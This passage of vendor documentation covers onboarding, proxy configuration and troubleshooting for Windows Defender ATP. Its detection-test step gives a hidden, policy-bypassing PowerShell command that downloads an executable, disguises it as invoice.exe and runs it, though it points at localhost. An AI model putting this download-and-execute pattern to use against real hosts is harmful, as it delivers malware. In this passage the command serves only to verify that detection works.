advanced attack detection and investigation capabilities, seamlessly through the Windows Defender Security
Center console.
The service supports the onboarding of the following servers:
Windows Server 2016
Windows Server 2019
For a practical guidance on what needs to be in place for licensing and infrastructure, see Protecting Windows
Servers with Windows Defender ATP.
Windows Server 2012 R2 and Windows Server 2016

There are two options to onboard Windows Server 2012 R2 and Windows Server 2016 to Windows Defender
ATP:
Option 1: Onboard through Azure Security Center
Option 2: Onboard through Windows Defender Security Center
Option 1: Onboard servers through Azure Security Center
1. In the navigation pane, select Settings > Machine management > Onboarding.
2. Select Windows Server 2012 R2 and 2016 as the operating system.
3. Click Onboard Servers in Azure Security Center.
4. Follow the onboarding instructions in Windows Defender Advanced Threat Protection with Azure Security
Center.
Option 2: Onboard servers through Windows Defender Security Center
You'll need to tak the following steps if you choose to onboard servers through Windows Defender Security
Center.
For Windows Server 2012 R2: Configure and update System Center Endpoint Protection clients.
NOTE
This step is required only if your organization uses System Center Endpoint Protection (SCEP) and you're onboarding
Windows Server 2012 R2.
Turn on server monitoring from Windows Defender Security Center.

If you're already leveraging System Center Operations Manager (SCOM ) or Azure Monitor (formerly known
as Operations Management Suite (OMS )), simply attach the Microsoft Monitoring Agent (MMA) to report to
your Windows Defender ATP workspace through Multi Homing support. Otherwise, install and configure
MMA to report sensor data to Windows Defender ATP as instructed below. For more information, see Collect
log data with Azure Log Analytics agent.
TIP
After onboarding the machine, you can choose to run a detection test to verify that it is properly onboarded to the service.
For more information, see Run a detection test on a newly onboarded Windows Defender ATP endpoint.
Configure and update System Center Endpoint Protection clients
IMPORTANT
This step is required only if your organization uses System Center Endpoint Protection (SCEP) and you're onboarding
Windows Server 2012 R2.
Windows Defender ATP integrates with System Center Endpoint Protection to provide visibility to malware
detections and to stop propagation of an attack in your organization by banning potentially malicious files or
suspected malware.
The following steps are required to enable this integration:
Install the January 2017 anti-malware platform update for Endpoint Protection clients
Configure the SCEP client Cloud Protection Service membership to the Advanced setting
Turn on Server monitoring from the Windows Defender Security Center portal
1. In the navigation pane, select Settings > Machine management > Onboarding.
2. Select Windows Server 2012 R2 and 2016 as the operating system.
3. Click Turn on server monitoring and confirm that you'd like to proceed with the environment set up.
When the set up completes, the Workspace ID and Workspace key fields are populated with unique
values. You'll need to use these values to configure the MMA agent.
Install and configure Microsoft Monitoring Agent (MMA ) to report sensor data to Windows Defender ATP
1. Download the agent setup file: Windows 64-bit agent.
2. Using the Workspace ID and Workspace key provided in the previous procedure, choose any of the
following installation methods to install the agent on the server:
Manually install the agent using setup
On the Agent Setup Options page, choose Connect the agent to Azure Log Analytics (OMS ).
Install the agent using the command line and configure the agent using a script.
3. You'll need to configure proxy settings for the Microsoft Monitoring Agent. For more information, see
Configure proxy settings.
Once completed, you should see onboarded servers in the portal within an hour.
Configure server proxy and Internet connectivity settings
Each Windows server must be able to connect to the Internet using HTTPS. This connection can be direct,
using a proxy, or through the OMS Gateway.
scanning (SSL inspection) is enabled, make sure that the following URLs are white-listed to permit
communication with Windows Defender ATP service:
*.oms.opinsights.azure.com 443
*.blob.core.windows.net 443
*.azure-automation.net 443
*.ods.opinsights.azure.com 443
winatp-gw-cus.microsoft.com 443
winatp-gw-eus.microsoft.com 443
winatp-gw-neu.microsoft.com 443
winatp-gw-weu.microsoft.com 443
winatp-gw-uks.microsoft.com 443
winatp-gw-ukw.microsoft.com 443
winatp-gw-aus.microsoft.com 443
winatp-gw-aue.microsoft.com 443
Windows Server, version 1803 and Windows Server 2019

To onboard Windows Server, version 1803 or Windows Server 2019, use the same method used when
onboarding Windows 10 machines.
Supported tools include:
Local script
Group Policy
System Center Configuration Manager 2012 / 2012 R2 1511 / 1602
VDI onboarding scripts for non-persistent machines
For more information, see Onboard Windows 10 machines. Support for Windows Server, version 1803
and Windows 2019 provides deeper insight into activities happening on the server, coverage for kernel and
memory attack detection, and enables response actions on Windows Server endpoint as well.
1. Configure Windows Defender ATP onboarding settings on the server. For more information, see Onboard
Windows 10 machines.
2. If you’re running a third party antimalware solution, you'll need to apply the following Windows Defender
AV passive mode settings and verify it was configured correctly:
a. Set the following registry entry:
Name: ForceDefenderPassiveMode
Value: 1
b. Run the following PowerShell command to verify that the passive mode was configured:
Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Sense" ;ID=84}
c. Confirm that a recent event containing the passive mode event is found:
3. Run the following command to check if Windows Defender AV is installed:

sc query Windefend
If the result is ‘The specified service does not exist as an installed service’, then you'll need to install
Windows Defender AV. For more information, see Windows Defender Antivirus in Windows 10.
Integration with Azure Security Center

Windows Defender ATP integrates with Azure Security Center to provide a comprehensive server protection
solution. With this integration Azure Security Center can leverage the power of Windows Defender ATP to
provide improved threat detection for Windows Servers.
NOTE
You'll need to have the appropriate license to enable this feature.
The following capabilities are included in this integration:

Automated onboarding - Windows Defender ATP sensor is automatically enabled on Windows Servers
that are onboarded to Azure Security Center. For more information on Azure Security Center onboarding,
see Onboarding to Azure Security Center Standard for enhanced security.
NOTE
Automated onboarding is only applicable for Windows Server 2012 R2 and Windows Server 2016.
Servers monitored by Azure Security Center will also be available in Windows Defender ATP - Azure
Security Center seamlessly connects to the Windows Defender ATP tenant, providing a single view across
clients and servers. In addition, Windows Defender ATP alerts will be available in the Azure Security Center
console.
Server investigation - Azure Security Center customers can access Windows Defender Security Center to
perform detailed investigation to uncover the scope of a potential breach
IMPORTANT
When you use Azure Security Center to monitor servers, a Windows Defender ATP tenant is automatically created. The
Windows Defender ATP data is stored in Europe by default.
If you use Windows Defender ATP before using Azure Security Center, your data will be stored in the location you
specified when you created your tenant even if you integrate with Azure Security Center at a later time.
Offboard servers
You can offboard Windows Server, version 1803 and Windows 2019 in the same method available for Windows
10 client machines.
For other server versions, you have two options to offboard servers from the service:
Uninstall the MMA agent
Remove the Windows Defender ATP workspace configuration
NOTE
Offboarding causes the server to stop sending sensor data to the portal but data from the server, including reference to any
alerts it has had will be retained for up to 6 months.
Uninstall servers by uinstalling the MMA agent

To offboard the server, you can uninstall the MMA agent from the server or detach it from reporting to your
Windows Defender ATP workspace. After offboarding the agent, the server will no longer send sensor data to
Windows Defender ATP. For more information, see To disable an agent.
Remove the Windows Defender ATP workspace configuration
To offboard the server, you can use either of the following methods:
Remove the Windows Defender ATP workspace configuration from the MMA agent
Run a PowerShell command to remove the configuration
Remove the Windows Defender ATP workspace configuration from the MMA agent
1. In the Microsoft Monitoring Agent Properties, select the Azure Log Analytics (OMS ) tab.
2. Select the Windows Defender ATP workspace, and click Remove.
Run a PowerShell command to remove the configuration
1. Get your Workspace ID: a. In the navigation pane, select Settings > Onboarding.
b. Select Windows Server 2012 R2 and 2016 as the operating system and get your Workspace ID:
2. Open an elevated PowerShell and run the following command. Use the Workspace ID you obtained and
replacing WorkspaceID :
# Load agent scripting object
$AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg
# Remove OMS Workspace
$AgentCfg.RemoveCloudWorkspace($WorkspaceID)
# Reload the configuration and apply changes
$AgentCfg.ReloadConfiguration()
Related topics
Troubleshooting Windows Defender Advanced Threat Protection onboarding issues
Applies to:
macOS
Linux
Windows Defender ATP provides a centralized security operations experience for Windows as well as non-
Windows platforms. You'll be able to see alerts from various supported operating systems (OS ) in Windows
Defender Security Center and better protect your organization's network.
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP
for the integration to work.
Onboarding non-Windows machines

You'll need to take the following steps to onboard non-Windows machines:
1. Select your preferred method of onboarding:
For macOS devices, you can choose to onboard through Windows Defender ATP or through a third-
party solution. For more information, see Microsoft Defender ATP for Mac.
For other non-Windows devices choose Onboard non-Windows machines through third-party
integration.
a. In the navigation pane, select Interoperability > Partners. Make sure the third-party
solution is listed.
a. In the Partner Applications tab, select the partner that supports your non-Windows
devices.
b. Select Open partner page to open the partner's page. Follow the instructions
provided on the page.
c. After creating an account or subscribing to the partner solution, you should get to a
stage where a tenant Global Admin in your organization is asked to accept a
permission request from the partner application. Read the permission request carefully
to make sure that it is aligned with the service that you require.
2. Run a detection test by following the instructions of the third-party solution.
Offboard non-Windows machines

1. Follow the third-party's documentation to disconnect the third-party solution from Windows Defender
ATP.
2. Remove permissions for the third-party solution in your Azure AD tenant.
a. Sign in to the Azure portal.
b. Select Azure Active Directory > Enterprise Applications.
c. Select the application you'd like to offboard.
d. Select the Delete button.
Related topics
Onboard servers
Troubleshooting Windows Defender Advanced Threat Protection onboarding issues
Onboard machines without Internet access to
Applies to:
To onboard machines without Internet access, you'll need to take the following general steps:
On-premise machines
Setup Azure Log Analytics (formerly known as OMS Gateway) to act as proxy or hub:
Azure Log Analytics Agent
Install and configure Microsoft Monitoring Agent (MMA) point to Microsoft Defender ATP Workspace
key & ID
Offline machines in the same network of Azure Log Analytics
Configure MMA to point to:
Azure Log Analytics IP as a proxy
Microsoft Defender ATP workspace key & ID
Azure virtual machines

Configure and enable Azure Log Analytics workspace
Setup Azure Log Analytics (formerly known as OMS Gateway) to act as proxy or hub:
Azure Log Analytics Agent
Install and configure Microsoft Monitoring Agent (MMA) point to Microsoft Defender ATP
Workspace key & ID
Offline Azure VMs in the same network of OMS Gateway
Configure Azure Log Analytics IP as a proxy
Azure Log Analytics Workspace Key & ID
Azure Security Center (ASC )
Security Policy > Log Analytics Workspace
Threat Detection > Allow Windows Defender ATP to access my data
For more information, see Working with security policies.
Run a detection test on a newly onboarded
Windows Defender ATP machine
Applies to:
Supported Windows 10 versions
Windows Server 2016
Windows Server, 2019
Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the
Windows Defender ATP service.
1. Create a folder: 'C:\test-WDATP -test'.
b. Right-click Command Prompt and select Run as administrator.
3. At the prompt, copy and run the following command:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference=

'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe',
'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
The Command Prompt window will close automatically. If successful, the detection test will be marked as
completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.
Related topics
Onboard servers
Experience Windows Defender ATP through
simulated attacks
Applies to:
TIP
You might want to experience Windows Defender ATP before you onboard more than a few machines to the
service. To do this, you can run controlled attack simulations on a few test machines. After running the simulated
attacks, you can review how Windows Defender ATP surfaces malicious activity and explore how it enables an
efficient response.
Before you begin

To run any of the provided simulations, you need at least one onboarded machine.
Read the walkthrough document provided with each attack scenario. Each document includes OS and application
requirements as well as detailed instructions that are specific to an attack scenario.
Run a simulation
1. In Help > Simulations & tutorials, select which of the available attack scenarios you would like to
simulate:
Scenario 1: Document drops backdoor - simulates delivery of a socially engineered lure
document. The document launches a specially crafted backdoor that gives attackers control.
Scenario 2: PowerShell script in fileless attack - simulates a fileless attack that relies on
PowerShell, showcasing attack surface reduction and machine learning detection of malicious
memory activity.
Scenario 3: Automated incident response - triggers Automated investigation, which automatically
hunts for and remediates breach artifacts to scale your incident response capacity.
2. Download and read the corresponding walkthrough document provided with your selected scenario.
3. Download the simulation file or copy the simulation script by navigating to Help > Simulations &
tutorials. You can choose to download the file or script on the test machine but it's not mandatory.
4. Run the simulation file or script on the test machine as instructed in the walkthrough document.
NOTE
Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test machine.
Related topics
Onboard machines
Configure machine proxy and Internet connectivity
settings
Applies to:
The Windows Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP ) to report sensor data and
communicate with the Windows Defender ATP service.
The embedded Windows Defender ATP sensor runs in system context using the LocalSystem account. The
sensor uses Microsoft Windows HTTP Services (WinHTTP ) to enable communication with the Windows
Defender ATP cloud service.
The WinHTTP configuration setting is independent of the Windows Internet (WinINet) internet browsing proxy
settings and can only discover a proxy server by using the following discovery methods:
Auto-discovery methods:
Transparent proxy
Web Proxy Auto-discovery Protocol (WPAD )
NOTE
If you're using Transparent proxy or WPAD in your network topology, you don't need special configuration settings. For
more information on Windows Defender ATP URL exclusions in the proxy, see Enable access to Windows Defender ATP
service URLs in the proxy server.
Manual static proxy configuration:

Registry based configuration
WinHTTP configured using netsh command – Suitable only for desktops in a stable topology (for
example: a desktop in a corporate network behind the same proxy)
Configure the proxy server manually using a registry-based static

proxy
Configure a registry-based static proxy to allow only Windows Defender ATP sensor to report diagnostic data
and communicate with Windows Defender ATP services if a computer is not be permitted to connect to the
Internet.
The static proxy is configurable through Group Policy (GP ). The group policy can be found under:
Administrative Templates > Windows Components > Data Collection and Preview Builds > Configure
Authenticated Proxy usage for the Connected User Experience and Telemetry Service
Set it to Enabled and select Disable Authenticated Proxy usage:
Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure connected user experiences and telemetry:
Configure the proxy:
The policy sets two registry values TelemetryProxyServer as REG_SZ and
DisableEnterpriseAuthProxy as REG_DWORD under the registry key
HKLM\Software\Policies\Microsoft\Windows\DataCollection .
The registry value TelemetryProxyServer takes the following string format:
<server name or ip>:<port>
For example: 10.0.0.6:8080

The registry value DisableEnterpriseAuthProxy should be set to 1.
Configure the proxy server manually using netsh command

Use netsh to configure a system-wide static proxy.
NOTE
This will affect all applications including Windows services which use WinHTTP with default proxy.
Laptops that are changing topology (for example: from office to home) will malfunction with netsh. Use the registry-
based static proxy configuration.
1. Open an elevated command-line:

2. Enter the following command and press Enter:
netsh winhttp set proxy <proxy>:<port>
For example: netsh winhttp set proxy 10.0.0.6:8080

To reset the winhttp proxy, enter the following command and press Enter
netsh winhttp reset proxy
See Netsh Command Syntax, Contexts, and Formatting to learn more.
Enable access to Windows Defender ATP service URLs in the proxy

server
scanning (SSL inspection) is enabled, make sure that the following URLs are not blocked by default. Do not
disable security monitoring or inspection of these URLs, but allow them as you would other internet traffic. They
permit communication with Windows Defender ATP service in port 80 and 443:
NOTE
URLs that include v20 in them are only needed if you have Windows 10, version 1803 or later machines. For example,
us-v20.events.data.microsoft.com is only needed if the machine is on Windows 10, version 1803 or later.
SERVICE LOCATION MICROSOFT.COM DNS RECORD
Common URLs for all locations *.blob.core.windows.net

crl.microsoft.com
ctldl.windowsupdate.com
events.data.microsoft.com
notify.windows.com
European Union eu.vortex-win.data.microsoft.com

eu-v20.events.data.microsoft.com
winatp-gw-neu.microsoft.com
winatp-gw-weu.microsoft.com
United Kingdom uk.vortex-win.data.microsoft.com

uk-v20.events.data.microsoft.com
winatp-gw-uks.microsoft.com
winatp-gw-ukw.microsoft.com
United States us.vortex-win.data.microsoft.com

us-v20.events.data.microsoft.com
winatp-gw-cus.microsoft.com
winatp-gw-eus.microsoft.com
If a proxy or firewall is blocking anonymous traffic, as Windows Defender ATP sensor is connecting from system
context, make sure anonymous traffic is permitted in the previously listed URLs.
Windows Defender ATP service backend IP range

If you network devices don't support the URLs white-listed in the prior section, you can use the following
information.
Windows Defender ATP is built on Azure cloud, deployed in the following regions:
+<Region Name="uswestcentral">
+<Region Name="useast2">
+<Region Name="useast">
+<Region Name="europenorth">
+<Region Name="europewest">
+<Region Name="uksouth">
+<Region Name="ukwest">
You can find the Azure IP range on Microsoft Azure Datacenter IP Ranges.
NOTE
As a cloud-based solution, the IP range can change. It's recommended you move to DNS resolving setting.
Verify client connectivity to Windows Defender ATP service URLs

Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate through the
proxy server in your environment, and that the proxy server allows traffic to the Windows Defender ATP service
URLs.
1. Download the connectivity verification tool to the PC where Windows Defender ATP sensor is running on.
2. Extract the contents of WDATPConnectivityAnalyzer on the machine.
3. Open an elevated command-line:
4. Enter the following command and press Enter:
HardDrivePath\WDATPConnectivityAnalyzer.cmd
Replace HardDrivePath with the path where the WDATPConnectivityAnalyzer tool was downloaded to,
for example
C:\Work\tools\WDATPConnectivityAnalyzer\WDATPConnectivityAnalyzer.cmd
5. Extract the WDATPConnectivityAnalyzerResult.zip file created by tool in the folder used in the
HardDrivePath.
6. Open WDATPConnectivityAnalyzer.txt and verify that you have performed the proxy configuration steps
to enable server discovery and access to the service URLs.
The tool checks the connectivity of Windows Defender ATP service URLs that Windows Defender ATP
client is configured to interact with. It then prints the results into the WDATPConnectivityAnalyzer.txt file
for each URL that can potentially be used to communicate with the Windows Defender ATP services. For
example:
Testing URL : https://xxx.microsoft.com/xxx
1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Succeeded (200)
3 - Proxy disabled: Succeeded (200)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
If at least one of the connectivity options returns a (200) status, then the Windows Defender ATP client can
communicate with the tested URL properly using this connectivity method.
However, if the connectivity check results indicate a failure, an HTTP error is displayed (see HTTP Status Codes).
You can then use the URLs in the table shown in Enable access to Windows Defender ATP service URLs in the
proxy server. The URLs you'll use will depend on the region selected during the onboarding procedure.
NOTE
When the TelemetryProxyServer is set, in Registry or via Group Policy, Windows Defender ATP will fall back to direct if it
can't access the defined proxy.
Related topics
Troubleshoot Windows Defender Advanced Threat Protection
onboarding issues
Applies to:
Windows Server 2016
You might need to troubleshoot the Windows Defender ATP onboarding process if you encounter issues. This page provides detailed steps
to troubleshoot onboarding issues that might occur when deploying with one of the deployment tools and common errors that might
occur on the machines.
If you have completed the onboarding process and don't see machines in the Machines list after an hour, it might indicate an onboarding or
connectivity problem.
Troubleshoot onboarding when deploying with Group Policy

Deployment with Group Policy is done by running the onboarding script on the machines. The Group Policy console does not indicate if
the deployment has succeeded or not.
If you have completed the onboarding process and don't see machines in the Machines list after an hour, you can check the output of the
script on the machines. For more information, see Troubleshoot onboarding when deploying with a script.
If the script completes successfully, see Troubleshoot onboarding issues on the machines for additional errors that might occur.
Troubleshoot onboarding issues when deploying with System Center Configuration

Manager
When onboarding machines using the following versions of System Center Configuration Manager:
System Center 2012 Configuration Manager
System Center 2012 R2 Configuration Manager
System Center Configuration Manager (current branch) version 1511
System Center Configuration Manager (current branch) version 1602
Deployment with the above-mentioned versions of System Center Configuration Manager is done by running the onboarding script on the
machines. You can track the deployment in the Configuration Manager Console.
If the deployment fails, you can check the output of the script on the machines.
If the onboarding completed successfully but the machines are not showing up in the Machines list after an hour, see Troubleshoot
onboarding issues on the machine for additional errors that might occur.
Troubleshoot onboarding when deploying with a script

Check the result of the script on the machine:
1. Click Start, type Event Viewer, and press Enter.
2. Go to Windows Logs > Application.
3. Look for an event from WDATPOnboarding event source.
If the script fails and the event is an error, you can check the event ID in the following table to help you troubleshoot the issue.
NOTE
The following event IDs are specific to the onboarding script only.
EVENT ID ERROR TYPE RESOLUTION STEPS

EVENT ID ERROR TYPE RESOLUTION STEPS
5 Offboarding data was found but couldn't be Check the permissions on the registry, specifically
deleted HKLM\SOFTWARE\Policies\Microsoft\Windows
.
10 Onboarding data couldn't be written to registry Check the permissions on the registry, specifically
HKLM\SOFTWARE\Policies\Microsoft\Windows
Advanced Threat
.
Verify that the script was ran as an administrator.
15 Failed to start SENSE service Check the service health ( sc query sense
command). Make sure it's not in an intermediate
state ('Pending_Stopped', 'Pending_Running')
and try to run the script again (with
administrator rights).
If the machine is running Windows 10, version

1607 and running the command
sc query sense returns START_PENDING ,
reboot the machine. If rebooting the machine
doesn't address the issue, upgrade to
KB4015217 and try onboarding again.
15 Failed to start SENSE service If the message of the error is: System error 577
has occurred. You need to enable the Windows
Defender Antivirus ELAM driver, see Ensure that
Windows Defender Antivirus is not disabled by a
policy for instructions.
30 The script failed to wait for the service to start The service could have taken more time to start
running or has encountered errors while trying to start.
For more information on events and errors
related to SENSE, see Review events and errors
using Event viewer.
35 The script failed to find needed onboarding When the SENSE service starts for the first time,
status registry value it writes onboarding status to the registry
location
HKLM\SOFTWARE\Microsoft\Windows Advanced
Threat Protection\Status
.
The script failed to find it after several seconds.
You can manually test it and check if it's there.
using Event viewer.
40 SENSE service onboarding status is not set to 1 The SENSE service has failed to onboard properly.
using Event viewer.
65 Insufficient privileges Run the script again with administrator privileges.
Troubleshoot onboarding issues using Microsoft Intune

You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.
If you have configured policies in Intune and they are not propagated on machines, you might need to configure automatic MDM
enrollment.
Use the following tables to understand the possible causes of issues while onboarding:
Microsoft Intune error codes and OMA-URIs table
Known issues with non-compliance table
Mobile Device Management (MDM ) event logs table
If none of the event logs and troubleshooting steps work, download the Local script from the Machine management section of the
portal, and run it in an elevated command prompt.
Microsoft Intune error codes and OMA-URIs:
POSSIBLE CAUSE AND
ERROR CODE HEX ERROR CODE DEC ERROR DESCRIPTION OMA-URI TROUBLESHOOTING STEPS
0x87D1FDE8 -2016281112 Remediation failed Onboarding Possible cause:

Offboarding Onboarding or offboarding
failed on a wrong blob:
wrong signature or missing
PreviousOrgIds fields.
Troubleshooting steps:
Check the event IDs in the
View agent onboarding
errors in the machine event
log section.
Check the MDM event logs

in the following table or
follow the instructions in
Diagnose MDM failures in
Windows 10.
Onboarding Possible cause: Windows

Offboarding Defender ATP Policy
SampleSharing registry key does not exist
or the OMA DM client
doesn't have permissions to
write to it.
Ensure that the following
registry key exists:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Micr
If it doesn't exist, open an

elevated command and add
the key.
SenseIsRunning Possible cause: An

OnboardingState attempt to remediate by
OrgId read-only property.
Onboarding has failed.
Check the troubleshooting
steps in Troubleshoot
onboarding issues on the
machine.
Check the MDM event logs

in the following table or
follow the instructions in
Diagnose MDM failures in
Windows 10.
All Possible cause: Attempt

to deploy Windows
Defender ATP on non-
supported SKU/Platform,
particularly Holographic
SKU.
Currently is supported
platforms: Enterprise,
Education, and Professional.
Server is not supported.
0x87D101A9 -2016345687 Syncml(425): The requested All Possible cause: Attempt

command failed because to deploy Windows
the sender does not have Defender ATP on non-
adequate access control supported SKU/Platform,
permissions (ACL) on the particularly Holographic
recipient. SKU.
Currently is supported
platforms: Enterprise,
Education, and Professional.
Known issues with non-compliance
The following table provides information on issues with non-compliance and how you can address the issues.
CASE SYMPTOMS POSSIBLE CAUSE AND TROUBLESHOOTING STEPS
1 Machine is compliant by SenseIsRunning OMA- Possible cause: Check that user passed OOBE
URI. But is non-compliant by OrgId, Onboarding after Windows installation or upgrade. During
and OnboardingState OMA-URIs. OOBE onboarding couldn't be completed but
SENSE is running already.
Troubleshooting steps: Wait for OOBE to

complete.
2 Machine is compliant by OrgId, Onboarding, and Possible cause: Sense service's startup type is
OnboardingState OMA-URIs, but is non- set as "Delayed Start". Sometimes this causes the
compliant by SenseIsRunning OMA-URI. Microsoft Intune server to report the machine as
non-compliant by SenseIsRunning when DM
session occurs on system start.
Troubleshooting steps: The issue should

automatically be fixed within 24 hours.
3 Machine is non-compliant Troubleshooting steps: Ensure that

Onboarding and Offboarding policies are not
deployed on the same machine at same time.
Mobile Device Management (MDM ) event logs

View the MDM event logs to troubleshoot issues that might arise during onboarding:
Log name: Microsoft\Windows\DeviceManagement-EnterpriseDiagnostics-Provider
Channel name: Admin
ID SEVERITY EVENT DESCRIPTION TROUBLESHOOTING STEPS
1819 Error Windows Defender Advanced Download the Cumulative Update

Threat Protection CSP: Failed to Set for Windows 10, 1607.
Node's Value. NodeId: (%1),
TokenName: (%2), Result: (%3).
Troubleshoot onboarding issues on the machine

If the deployment tools used does not indicate an error in the onboarding process, but machines are still not appearing in the machines list
in an hour, go through the following verification topics to check if an error occurred with the Windows Defender ATP agent:
View agent onboarding errors in the machine event log
Ensure the diagnostic data service is enabled
Ensure the service is set to start
Ensure the machine has an Internet connection
Ensure that Windows Defender Antivirus is not disabled by a policy
View agent onboarding errors in the machine event log
1. Click Start, type Event Viewer, and press Enter.
2. In the Event Viewer (Local) pane, expand Applications and Services Logs > Microsoft > Windows > SENSE.
NOTE
SENSE is the internal name used to refer to the behavioral sensor that powers Windows Defender ATP.
3. Select Operational to load the log.

4. In the Action pane, click Filter Current log.
5. On the Filter tab, under Event level: select Critical, Warning, and Error, and click OK.
6. Events which can indicate issues will appear in the Operational pane. You can attempt to troubleshoot them based on the solutions
in the following table:
EVENT ID MESSAGE RESOLUTION STEPS
5 Windows Defender Advanced Threat Protection Ensure the machine has Internet access.
service failed to connect to the server at variable
6 Windows Defender Advanced Threat Protection Run the onboarding script again.
service is not onboarded and no onboarding
parameters were found. Failure code: variable
7 Windows Defender Advanced Threat Protection Ensure the machine has Internet access, then run
service failed to read the onboarding parameters. the entire onboarding process again.
Failure code: variable
9 Windows Defender Advanced Threat Protection If the event happened during onboarding, reboot
service failed to change its start type. Failure and re-attempt running the onboarding script.
code: variable For more information, see Run the onboarding
script again.
If the event happened during offboarding,

contact support.
10 Windows Defender Advanced Threat Protection If the event happened during onboarding, re-
service failed to persist the onboarding attempt running the onboarding script. For more
information. Failure code: variable information, see Run the onboarding script again.
If the problem persists, contact support.
15 Windows Defender Advanced Threat Protection Ensure the machine has Internet access.
cannot start command channel with URL:
variable
17 Windows Defender Advanced Threat Protection Run the onboarding script again. If the problem
service failed to change the Connected User persists, contact support.
Experiences and Telemetry service location.
Failure code: variable
25 Windows Defender Advanced Threat Protection Contact support.

service failed to reset health status in the
registry. Failure code: variable
27 Failed to enable Windows Defender Advanced Contact support.

Threat Protection mode in Windows Defender.
Onboarding process failed. Failure code: variable
EVENT ID MESSAGE RESOLUTION STEPS
29 Failed to read the offboarding parameters. Error Ensure the machine has Internet access, then run
type: %1, Error code: %2, Description: %3 the entire offboarding process again.
30 Failed to disable Contact support.

$(build.sense.productDisplayName) mode in
Windows Defender Advanced Threat Protection.
Failure code: %1
32 $(build.sense.productDisplayName) service failed Verify that the service start type is manual and
to request to stop itself after offboarding reboot the machine.
process. Failure code: %1
55 Failed to create the Secure ETW autologger. Reboot the machine.

Failure code: %1
63 Updating the start type of external service. Identify what is causing changes in start type of
Name: %1, actual start type: %2, expected start mentioned service. If the exit code is not 0, fix
type: %3, exit code: %4 the start type manually to expected start type.
64 Starting stopped external service. Name: %1, exit Contact support if the event keeps re-appearing.
code: %2
68 The start type of the service is unexpected. Identify what is causing changes in start type. Fix
Service name: %1, actual start type: %2, expected mentioned service start type.
start type: %3
69 The service is stopped. Service name: %1 Start the mentioned service. Contact support if
persists.
There are additional components on the machine that the Windows Defender ATP agent depends on to function properly. If there are no
onboarding related errors in the Windows Defender ATP agent event log, proceed with the following steps to ensure that the additional
components are configured correctly.
If the machines aren't reporting correctly, you might need to check that the Windows 10 diagnostic data service is set to automatically start
and is running on the machine. The service might have been disabled by other programs or user configuration changes.
First, you should check that the service is set to start automatically when Windows starts, then you should check that the service is
currently running (and start it if it isn't).
Ensure the service is set to start
a. Click Start, type cmd, and press Enter.
sc qc diagtrack
If the START_TYPE is not set to AUTO_START , then you'll need to set the service to automatically start.
a. Click Start, type cmd, and press Enter.
sc qc diagtrack
4. Start the service.

a. In the command prompt, type the following command and press Enter:
sc start diagtrack
Ensure the machine has an Internet connection

The Window Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP ) to report sensor data and communicate with the
Windows Defender ATP service.
WinHTTP is independent of the Internet browsing proxy settings and other user context applications and must be able to detect the proxy
servers that are available in your particular environment.
To ensure that sensor has service connectivity, follow the steps described in the Verify client connectivity to Windows Defender ATP service
URLs topic.
If the verification fails and your environment is using a proxy to connect to the Internet, then follow the steps described in Configure proxy
and Internet connectivity settings topic.
Ensure that Windows Defender Antivirus is not disabled by a policy
Problem: The Windows Defender ATP service does not start after onboarding.
Symptom: Onboarding successfully completes, but you see error 577 when trying to start the service.
Solution: If your machines are running a third-party antimalware client, the Windows Defender ATP agent needs the Windows Defender
Early Launch Antimalware (ELAM ) driver to be enabled. You must ensure that it's not disabled in system policy.
Depending on the tool that you use to implement policies, you'll need to verify that the following Windows Defender policies are
cleared:
DisableAntiSpyware
DisableAntiVirus
For example, in Group Policy there should be no entries such as the following values:
<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiSpyware"/>
</Key>
<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiVirus"/></Key>
After clearing the policy, run the onboarding steps again.

You can also check the following registry key values to verify that the policy is disabled:
1. Open the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender .
2. Ensure that the value DisableAntiSpyware is not present.
Troubleshoot onboarding issues on a server

If you encounter issues while onboarding a server, go through the following verification steps to address possible issues.
Ensure Microsoft Monitoring Agent (MMA) is installed and configured to report sensor data to the service
Ensure that the server proxy and Internet connectivity settings are configured properly
You might also need to check the following:
Check that there is a Windows Defender Advanced Threat Protection Service running in the Processes tab in Task Manager. For
example:
Check Event Viewer > Applications and Services Logs > Operation Manager to see if there are any errors.
In Services, check if the Microsoft Monitoring Agent is running on the server. For example,
In Microsoft Monitoring Agent > Azure Log Analytics (OMS ), check the Workspaces and verify that the status is running.
Check to see that machines are reflected in the Machines list in the portal.
Related topics
Onboard machines
Configure machine proxy and Internet connectivity settings
Troubleshoot subscription and portal access issues
Applies to:
This page provides detailed steps to troubleshoot issues that might occur when setting up your Windows Defender
ATP service.
If you receive an error message, Windows Defender Security Center will provide a detailed explanation on what
the issue is and relevant links will be supplied.
No subscriptions found
If while accessing Windows Defender Security Center you get a No subscriptions found message, it means the
Azure Active Directory (AAD ) used to login the user to the portal, does not have a Windows Defender ATP license.
Potential reasons:
The Windows E5 and Office E5 licenses are separate licenses.
The license was purchased but not provisioned to this AAD instance.
It could be a license provisioning issue.
It could be you inadvertently provisioned the license to a different Microsoft AAD than the one used for
authentication into the service.
For both cases you should contact Microsoft support at General Windows Defender ATP Support or Volume
license support.
Your subscription has expired

If while accessing Windows Defender Security Center you get a Your subscription has expired message, your
online service subscription has expired. Windows Defender ATP subscription, like any other online service
subscription, has an expiration date.
You can choose to renew or extend the license at any point in time. When accessing the portal after the expiration
